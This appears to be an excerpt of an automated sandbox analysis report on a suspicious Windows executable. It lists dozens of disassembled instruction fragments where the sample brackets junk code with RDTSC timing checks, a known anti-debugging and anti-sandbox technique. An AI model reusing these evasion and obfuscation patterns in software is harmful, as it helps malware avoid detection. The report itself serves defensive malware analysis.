              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5CDD second address: 8A5CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5CE1 second address: 8A5CE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5CE7 second address: 8A5CF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F92851B8946h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5CF5 second address: 8A5D0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A618C second address: 8A6193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A6193 second address: 8A61AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F9284AFDC96h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A61AF second address: 8A61B5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7A92 second address: 8A7AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9284AFDC86h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d js 00007F9284AFDC88h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7AA7 second address: 8A7AB3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F92851B894Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A98B0 second address: 8A98DD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9284AFDC8Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jo 00007F9284AFDC8Eh 0x00000011 push eax 0x00000012 jo 00007F9284AFDC86h 0x00000018 pop eax 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d pushad 0x0000001e pushad 0x0000001f jnp 00007F9284AFDC86h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A98DD second address: 8A9918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F92851B8948h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push ebx 0x0000000f jc 00007F92851B8956h 0x00000015 jmp 00007F92851B8950h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 pushad 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 push edx 0x00000024 pop edx 0x00000025 popad 0x00000026 jnp 00007F92851B894Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AA50A second address: 8AA552 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F9284AFDC88h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 and esi, dword ptr [ebp+122D3CF5h] 0x0000002b nop 0x0000002c push eax 0x0000002d push edx 0x0000002e jg 00007F9284AFDC98h 0x00000034 jmp 00007F9284AFDC92h 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB60F second address: 8AB613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF50 second address: 8ABF7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F9284AFDC96h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F9284AFDC8Ch 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB613 second address: 8AB61D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F92851B8946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC7AE second address: 8AC7B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF7D second address: 8ABF83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD0AD second address: 8AD0B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF83 second address: 8ABF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD3DF second address: 8AD3E9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9284AFDC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD0B3 second address: 8AD0BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F92851B8946h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD3E9 second address: 8AD3F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F9284AFDC86h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ADEF4 second address: 8ADEFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE748 second address: 8AE74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4247 second address: 8B4251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4251 second address: 8B4255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6342 second address: 8B6346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B73AF second address: 8B73BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F9284AFDC8Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B73BD second address: 8B7408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a jnp 00007F92851B894Ch 0x00000010 add edi, 6C2B8234h 0x00000016 push 00000000h 0x00000018 or dword ptr [ebp+122D1C46h], eax 0x0000001e xchg eax, esi 0x0000001f jmp 00007F92851B894Ah 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jc 00007F92851B8946h 0x0000002e jmp 00007F92851B8957h 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B85D6 second address: 8B8647 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F9284AFDC88h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 sbb bl, FFFFFFE0h 0x0000002a mov edi, ecx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F9284AFDC88h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 sub dword ptr [ebp+122D347Ch], edi 0x0000004e push 00000000h 0x00000050 sub edi, dword ptr [ebp+1245B86Eh] 0x00000056 push eax 0x00000057 push ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B8647 second address: 8B864B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B864B second address: 8B864F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BA80F second address: 8BA89D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8953h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D1C5Bh], edi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F92851B8948h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F92851B8948h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a xchg eax, esi 0x0000004b jmp 00007F92851B8954h 0x00000050 push eax 0x00000051 pushad 0x00000052 jmp 00007F92851B894Ch 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BA89D second address: 8BA8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868D15 second address: 868D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCEF0 second address: 8BCEF5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BDDF4 second address: 8BDDF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BDDF8 second address: 8BDE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BDE05 second address: 8BDE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BA9F1 second address: 8BA9F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BEDB5 second address: 8BEDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BEDB9 second address: 8BEDBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD0E5 second address: 8BD0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD0EC second address: 8BD0F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F9284AFDC86h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFDD3 second address: 8BFDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F92851B894Eh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863B7B second address: 863B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jl 00007F9284AFDC86h 0x0000000e jmp 00007F9284AFDC8Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863B9A second address: 863BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863BA3 second address: 863BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863BA9 second address: 863BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863BAD second address: 863BB8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C242E second address: 8C2432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2432 second address: 8C2436 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2436 second address: 8C243C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3477 second address: 8C34CC instructions: 0x00000000 rdtsc 0x00000002 js 00007F9284AFDC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F9284AFDC88h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 jmp 00007F9284AFDC8Bh 0x0000002d push 00000000h 0x0000002f mov bh, dl 0x00000031 push 00000000h 0x00000033 mov edi, dword ptr [ebp+122D2A40h] 0x00000039 push eax 0x0000003a pushad 0x0000003b ja 00007F9284AFDC8Ch 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4679 second address: 8C4709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F92851B8950h 0x00000009 popad 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F92851B8948h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov ebx, 58391709h 0x0000002d jmp 00007F92851B8953h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebp 0x00000037 call 00007F92851B8948h 0x0000003c pop ebp 0x0000003d mov dword ptr [esp+04h], ebp 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc ebp 0x0000004a push ebp 0x0000004b ret 0x0000004c pop ebp 0x0000004d ret 0x0000004e mov ebx, 4A2CAC56h 0x00000053 push 00000000h 0x00000055 and ebx, 4E95189Eh 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e push edx 0x0000005f jmp 00007F92851B894Ch 0x00000064 pop edx 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4709 second address: 8C4729 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9284AFDC88h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9284AFDC90h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4729 second address: 8C4732 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C66B1 second address: 8C66B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C66B7 second address: 8C66C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C66C5 second address: 8C66C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFF0A second address: 8BFF27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B894Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jbe 00007F92851B894Eh 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CAE04 second address: 8CAE0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CAE0A second address: 8CAE34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F92851B8946h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F92851B8955h 0x00000010 popad 0x00000011 pushad 0x00000012 jl 00007F92851B8946h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CD4CA second address: 8CD4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jns 00007F9284AFDC86h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1666 second address: 8D166C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0D04 second address: 8D0D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0D0F second address: 8D0D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0D13 second address: 8D0D17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0D17 second address: 8D0D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8605B0 second address: 8605B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA31D second address: 8DA321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DAA55 second address: 8DAA77 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9284AFDC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnl 00007F9284AFDC86h 0x00000014 jmp 00007F9284AFDC8Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DAA77 second address: 8DAA8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F92851B894Ah 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DAEAB second address: 8DAEB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DAEB6 second address: 8DAEC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F92851B894Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB16B second address: 8DB19E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F9284AFDC86h 0x00000009 jmp 00007F9284AFDC94h 0x0000000e jmp 00007F9284AFDC94h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB2EC second address: 8DB343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F92851B8957h 0x0000000d jo 00007F92851B8946h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 jmp 00007F92851B894Fh 0x0000001b popad 0x0000001c pushad 0x0000001d push ecx 0x0000001e jmp 00007F92851B894Ah 0x00000023 pop ecx 0x00000024 jmp 00007F92851B894Eh 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB343 second address: 8DB347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB347 second address: 8DB34B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB34B second address: 8DB351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85D068 second address: 85D091 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F92851B8955h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jnp 00007F92851B8946h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E2CE8 second address: 8E2D03 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9284AFDC91h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF79 second address: 8ABF7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E321D second address: 8E3221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3221 second address: 8E3236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F92851B8946h 0x0000000d js 00007F92851B8946h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E35D6 second address: 8E35EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jc 00007F9284AFDC86h 0x0000000c jg 00007F9284AFDC86h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
